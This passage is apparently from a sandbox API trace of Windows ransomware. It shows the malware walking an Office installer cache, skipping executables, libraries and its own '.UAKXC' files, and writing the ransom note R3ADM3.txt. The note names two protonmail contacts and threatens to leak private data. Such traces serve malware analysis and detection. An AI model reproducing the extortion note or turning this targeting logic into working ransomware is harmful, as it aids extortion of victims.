nFileSizeLow=0x10b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0149.937] lstrcmpW (lpString1="Office32WW.xml", lpString2=".") returned 1 [0149.937] lstrcmpW (lpString1="Office32WW.xml", lpString2="..") returned 1 [0149.937] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".UAKXC") returned 0x0 [0149.937] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".exe") returned 0x0 [0149.937] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".dll") returned 0x0 [0149.937] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".lnk") returned 0x0 [0149.937] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".sys") returned 0x0 [0149.937] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".msi") returned 0x0 [0149.937] StrStrIW (lpFirst="Office32WW.xml", lpSrch="R3ADM3.txt") returned 0x0 [0149.937] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2e78 [0149.937] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcdd8 [0149.937] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0149.937] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.937] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedce60 | out: hHeap=0xea0000) returned 1 [0149.937] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcdd8 | out: hHeap=0xea0000) returned 1 [0149.937] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2e78 | out: hHeap=0xea0000) returned 1 [0149.937] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6f10 [0149.938] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2e78 [0149.938] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef74f8 [0149.938] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef6f10 | out: hHeap=0xea0000) returned 1 [0149.938] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.938] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe57f8e0, ftCreationTime.dwHighDateTime=0x1cbe1cb, ftLastAccessTime.dwLowDateTime=0xfe57f8e0, ftLastAccessTime.dwHighDateTime=0x1cbe1cb, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0149.938] lstrcmpW (lpString1="ose.exe", lpString2=".") returned 1 [0149.938] lstrcmpW (lpString1="ose.exe", lpString2="..") returned 1 [0149.938] StrStrIW (lpFirst="ose.exe", lpSrch=".UAKXC") returned 0x0 [0149.938] StrStrIW (lpFirst="ose.exe", lpSrch=".exe") returned=".exe" [0149.938] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6644b620, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x6644b620, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa81b8770, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0149.938] lstrcmpW (lpString1="osetup.dll", lpString2=".") returned 1 [0149.938] lstrcmpW (lpString1="osetup.dll", lpString2="..") returned 1 [0149.938] StrStrIW (lpFirst="osetup.dll", lpSrch=".UAKXC") returned 0x0 [0149.938] StrStrIW (lpFirst="osetup.dll", lpSrch=".exe") returned 0x0 [0149.938] StrStrIW (lpFirst="osetup.dll", lpSrch=".dll") returned=".dll" [0149.938] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8238e540, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x8238e540, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5ddcc70, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0149.938] lstrcmpW (lpString1="OWOW32WW.cab", lpString2=".") returned 1 [0149.938] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="..") returned 1 [0149.938] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".UAKXC") returned 0x0 [0149.938] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".exe") returned 0x0 [0149.938] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".dll") returned 0x0 [0149.938] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".lnk") returned 0x0 [0149.938] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".sys") returned 0x0 [0149.938] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".msi") returned 0x0 [0149.938] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch="R3ADM3.txt") returned 0x0 [0149.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2b28 [0149.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcdd8 [0149.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0149.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.939] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedce60 | out: hHeap=0xea0000) returned 1 [0149.939] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcdd8 | out: hHeap=0xea0000) returned 1 [0149.939] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2b28 | out: hHeap=0xea0000) returned 1 [0149.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6f10 [0149.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2b28 [0149.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef75a0 [0149.939] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef6f10 | out: hHeap=0xea0000) returned 1 [0149.939] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.939] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7bd91af0, ftCreationTime.dwHighDateTime=0x1cb07b2, ftLastAccessTime.dwLowDateTime=0x7bd91af0, ftLastAccessTime.dwHighDateTime=0x1cb07b2, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0149.939] lstrcmpW (lpString1="PidGenX.dll", lpString2=".") returned 1 [0149.939] lstrcmpW (lpString1="PidGenX.dll", lpString2="..") returned 1 [0149.939] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".UAKXC") returned 0x0 [0149.939] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".exe") returned 0x0 [0149.939] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".dll") returned=".dll" [0149.939] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2a2397e0, ftCreationTime.dwHighDateTime=0x1cbe19a, ftLastAccessTime.dwLowDateTime=0x2a2397e0, ftLastAccessTime.dwHighDateTime=0x1cbe19a, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0149.939] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2=".") returned 1 [0149.939] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="..") returned 1 [0149.939] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".UAKXC") returned 0x0 [0149.939] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".exe") returned 0x0 [0149.940] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".dll") returned 0x0 [0149.940] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".lnk") returned 0x0 [0149.940] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".sys") returned 0x0 [0149.940] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".msi") returned 0x0 [0149.940] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch="R3ADM3.txt") returned 0x0 [0149.940] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1890 [0149.940] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcdd8 [0149.940] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0149.940] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.940] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedce60 | out: hHeap=0xea0000) returned 1 [0149.940] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcdd8 | out: hHeap=0xea0000) returned 1 [0149.940] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1890 | out: hHeap=0xea0000) returned 1 [0149.940] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xb0) returned 0x7770008 [0149.940] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2b00 [0149.940] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xb0) returned 0xee0108 [0149.940] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7770008 | out: hHeap=0xea0000) returned 1 [0149.940] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.940] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c1614f0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7c1614f0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xa4c400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrjProrWW.msi", cAlternateFileName="PRJPRO~1.MSI")) returned 1 [0149.940] lstrcmpW (lpString1="PrjProrWW.msi", lpString2=".") returned 1 [0149.941] lstrcmpW (lpString1="PrjProrWW.msi", lpString2="..") returned 1 [0149.941] StrStrIW (lpFirst="PrjProrWW.msi", lpSrch=".UAKXC") returned 0x0 [0149.941] StrStrIW (lpFirst="PrjProrWW.msi", lpSrch=".exe") returned 0x0 [0149.941] StrStrIW (lpFirst="PrjProrWW.msi", lpSrch=".dll") returned 0x0 [0149.941] StrStrIW (lpFirst="PrjProrWW.msi", lpSrch=".lnk") returned 0x0 [0149.941] StrStrIW (lpFirst="PrjProrWW.msi", lpSrch=".sys") returned 0x0 [0149.941] StrStrIW (lpFirst="PrjProrWW.msi", lpSrch=".msi") returned=".msi" [0149.941] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cabec50, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7cabec50, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1915, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrjProrWW.xml", cAlternateFileName="PRJPRO~1.XML")) returned 1 [0149.941] lstrcmpW (lpString1="PrjProrWW.xml", lpString2=".") returned 1 [0149.941] lstrcmpW (lpString1="PrjProrWW.xml", lpString2="..") returned 1 [0149.941] StrStrIW (lpFirst="PrjProrWW.xml", lpSrch=".UAKXC") returned 0x0 [0149.941] StrStrIW (lpFirst="PrjProrWW.xml", lpSrch=".exe") returned 0x0 [0149.941] StrStrIW (lpFirst="PrjProrWW.xml", lpSrch=".dll") returned 0x0 [0149.941] StrStrIW (lpFirst="PrjProrWW.xml", lpSrch=".lnk") returned 0x0 [0149.941] StrStrIW (lpFirst="PrjProrWW.xml", lpSrch=".sys") returned 0x0 [0149.941] StrStrIW (lpFirst="PrjProrWW.xml", lpSrch=".msi") returned 0x0 [0149.941] StrStrIW (lpFirst="PrjProrWW.xml", lpSrch="R3ADM3.txt") returned 0x0 [0149.941] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3438 [0149.941] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcdd8 [0149.941] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0149.941] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.941] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedce60 | out: hHeap=0xea0000) returned 1 [0149.941] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcdd8 | out: hHeap=0xea0000) returned 1 [0149.941] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef3438 | out: hHeap=0xea0000) returned 1 [0149.941] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6f10 [0149.942] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3438 [0149.942] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0x74a1020 [0149.942] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef6f10 | out: hHeap=0xea0000) returned 1 [0149.942] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.942] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c87b0c0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x6c87b0c0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa6b67930, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x9b6ba9f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrjPrrWW.cab", cAlternateFileName="")) returned 1 [0149.942] lstrcmpW (lpString1="PrjPrrWW.cab", lpString2=".") returned 1 [0149.943] lstrcmpW (lpString1="PrjPrrWW.cab", lpString2="..") returned 1 [0149.943] StrStrIW (lpFirst="PrjPrrWW.cab", lpSrch=".UAKXC") returned 0x0 [0149.943] StrStrIW (lpFirst="PrjPrrWW.cab", lpSrch=".exe") returned 0x0 [0149.943] StrStrIW (lpFirst="PrjPrrWW.cab", lpSrch=".dll") returned 0x0 [0149.943] StrStrIW (lpFirst="PrjPrrWW.cab", lpSrch=".lnk") returned 0x0 [0149.943] StrStrIW (lpFirst="PrjPrrWW.cab", lpSrch=".sys") returned 0x0 [0149.943] StrStrIW (lpFirst="PrjPrrWW.cab", lpSrch=".msi") returned 0x0 [0149.943] StrStrIW (lpFirst="PrjPrrWW.cab", lpSrch="R3ADM3.txt") returned 0x0 [0149.943] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2ad8 [0149.943] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcdd8 [0149.943] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0149.943] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.943] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedce60 | out: hHeap=0xea0000) returned 1 [0149.943] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcdd8 | out: hHeap=0xea0000) returned 1 [0149.943] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2ad8 | out: hHeap=0xea0000) returned 1 [0149.943] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6f10 [0149.943] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2ad8 [0149.943] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0x74a10c8 [0149.943] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef6f10 | out: hHeap=0xea0000) returned 1 [0149.943] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.943] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5e6267b0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5e6267b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5e6267b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0149.943] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0149.943] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0149.943] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0149.943] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0149.944] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0149.944] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0149.944] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0149.944] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0149.944] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0149.944] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x69dde270, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x69dde270, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa8191670, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0149.944] lstrcmpW (lpString1="setup.exe", lpString2=".") returned 1 [0149.944] lstrcmpW (lpString1="setup.exe", lpString2="..") returned 1 [0149.944] StrStrIW (lpFirst="setup.exe", lpSrch=".UAKXC") returned 0x0 [0149.944] StrStrIW (lpFirst="setup.exe", lpSrch=".exe") returned=".exe" [0149.944] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca00570, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca00570, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0149.944] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0149.944] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0149.944] StrStrIW (lpFirst="Setup.xml", lpSrch=".UAKXC") returned 0x0 [0149.944] StrStrIW (lpFirst="Setup.xml", lpSrch=".exe") returned 0x0 [0149.944] StrStrIW (lpFirst="Setup.xml", lpSrch=".dll") returned 0x0 [0149.944] StrStrIW (lpFirst="Setup.xml", lpSrch=".lnk") returned 0x0 [0149.944] StrStrIW (lpFirst="Setup.xml", lpSrch=".sys") returned 0x0 [0149.944] StrStrIW (lpFirst="Setup.xml", lpSrch=".msi") returned 0x0 [0149.944] StrStrIW (lpFirst="Setup.xml", lpSrch="R3ADM3.txt") returned 0x0 [0149.944] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3398 [0149.944] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcdd8 [0149.944] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0149.944] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.944] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedce60 | out: hHeap=0xea0000) returned 1 [0149.945] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcdd8 | out: hHeap=0xea0000) returned 1 [0149.945] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef3398 | out: hHeap=0xea0000) returned 1 [0149.945] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6f10 [0149.945] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3398 [0149.945] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0x74a1170 [0149.945] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef6f10 | out: hHeap=0xea0000) returned 1 [0149.945] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.945] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca00570, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca00570, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0149.945] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd548 | out: hHeap=0xea0000) returned 1 [0149.945] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3c38 | out: hHeap=0xea0000) returned 1 [0149.945] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0149.945] Sleep (dwMilliseconds=0x32) [0149.994] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0149.994] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeddcb8 | out: hHeap=0xea0000) returned 1 [0149.994] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddcb8 [0149.994] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd548 [0149.994] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0149.994] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd548 | out: hHeap=0xea0000) returned 1 [0149.994] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd548 [0149.994] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3c38 [0149.994] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcdd8 [0149.994] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0149.995] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.995] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedce60 | out: hHeap=0xea0000) returned 1 [0149.995] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcdd8 | out: hHeap=0xea0000) returned 1 [0149.995] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3c38 | out: hHeap=0xea0000) returned 1 [0149.995] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\R3ADM3.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0151.090] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0151.090] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0151.091] CloseHandle (hObject=0x6dc) returned 1 [0151.092] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0151.092] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd548 | out: hHeap=0xea0000) returned 1 [0151.092] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x5ef85e50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5ef85e50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0151.092] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0151.092] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x5ef85e50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5ef85e50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.092] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0151.092] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0151.092] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe5ed9630, 